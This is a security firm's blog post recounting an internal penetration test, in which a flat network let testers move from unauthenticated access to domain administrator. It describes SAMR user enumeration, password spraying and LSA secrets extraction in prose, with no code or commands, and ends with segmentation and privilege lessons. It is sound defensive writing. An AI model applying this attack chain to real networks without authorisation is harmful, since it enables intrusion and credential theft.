Pentest story: Why internal segmentation still matters

In cybersecurity, much of the focus is placed on defending the perimeter, patching internet-facing systems, blocking phishing emails, enforcing MFA etc. But what happens when someone is already inside the network?

This is why internal segmentation and least privilege access are just as critical as external defenses. A breach doesn’t always begin with a sophisticated exploit-sometimes all it takes is a misconfigured system, an exposed protocol, or an account configured with a weak password.

In this post, we walk through a real-world internal penetration test that illustrates how quickly an attacker can escalate from zero access to full domain compromise when internal boundaries are weak or completely missing.

On one of our latest penetration testing projects, we were engaged to conduct an internal penetration test simulating an attacker who had gained access to the corporate network. No domain credentials or internal information were provided. We were simply connected to the internal LAN, assigned an IP address representing a third-party contractor or a rogue device into the environment.

Our initial activity was basic network enumeration. Even without authentication, we were able to identify a large number of systems across the internal environment. File servers, domain controllers, application servers, and user endpoints all responded to discovery probes.

This level of visibility from an unauthenticated host was the result of a flat internal network architecture. A common design that simplifies IT operations but leaves the environment exposed to lateral movement. In a more segmented setup, an unknown host wouldn’t be able to communicate with critical assets outside its assigned subnet.

Initially, we leveraged the SAMR (Security Account Manager Remote) protocol to enumerate domain account information without needing credentials. This revealed a list of valid domain usernames, many of which followed predictable naming conventions.

With this list in hand, a password spray attack was launched with a minimized number of attempts per account to avoid lockouts. The spray was successful, and a password of a valid domain user account was identified. This was the first major step forward. Although this account was intended to have low privileges, further investigation revealed a broader issue.

The access rights of the compromised domain account were checked, and it was found that this user was a local administrator on multiple systems across the environment. With local administrator privileges on several machines, we extracted Local Security Authority (LSA) secrets from one of the systems uncovering stored credentials used by Windows services. Among these secrets, the cleartext password of a domain administrator account was discovered. This privileged account was configured as the service account for an enterprise software agent responsible for deploying software updates across the network.

With those credentials in hand, we obtained full domain administrator access, but we didn't stop there. To demonstrate the potential impact of this attack chain, a sample of sensitive data was accessed.

This assessment is a textbook example of how internal oversights can lead to critical compromise even when no external attack is involved. A flat network, weak credential hygiene, and excessive privileges created a chain of opportunities that allowed us to go from unauthenticated network access to domain dominance in a short timeframe.

Key lessons from this engagement:

• Segment internal networks to limit lateral movement and reduce exposure between critical systems.

• Restrict local administrator privileges to only those who truly need them. 

• Store privileged credentials securely to prevent unintended access or extraction.

• Implement Privileged Access Management (PAM) to control, monitor, and audit the use of high-privilege accounts.

• Adopt a defense-in-depth strategy to ensure multiple layers of security protect your core infrastructure.